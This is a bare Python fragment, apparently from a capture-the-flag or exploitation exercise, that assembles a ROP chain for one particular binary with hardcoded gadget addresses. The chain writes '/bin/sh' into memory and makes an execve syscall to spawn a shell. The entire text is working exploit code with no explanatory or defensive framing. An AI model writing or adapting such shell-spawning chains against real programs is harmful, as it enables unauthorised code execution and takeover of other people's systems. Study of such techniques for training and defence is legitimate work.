payload = p64(0x4017d3)
#0x00000000004017d3: pop rdi; ret; 
payload += p64(0x516fa0)+p64(0x46e3c7)
# 0x000000000046e3c7: pop rax; ret; 
payload += p64(0x68662f6e69622f)+p64(0x44105c)
# 0x000000000044105c: mov qword ptr [rdi + 0xd0], rax; mov eax, 1; ret; 
payload += p64(0x46e3c7)
# 0x000000000046e3c7: pop rax; ret; 
payload += p64(0x3b)+p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x517070)+p64(0x45cbd1)
# 0x000000000045cbd1: pop rdx; ret; 
payload += p64(0x0)+p64(0x405b75)
# 0x0000000000405b75: pop rsi; pop rbp; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x438660)
# 0x0000000000438660: syscall; 
payload += b''
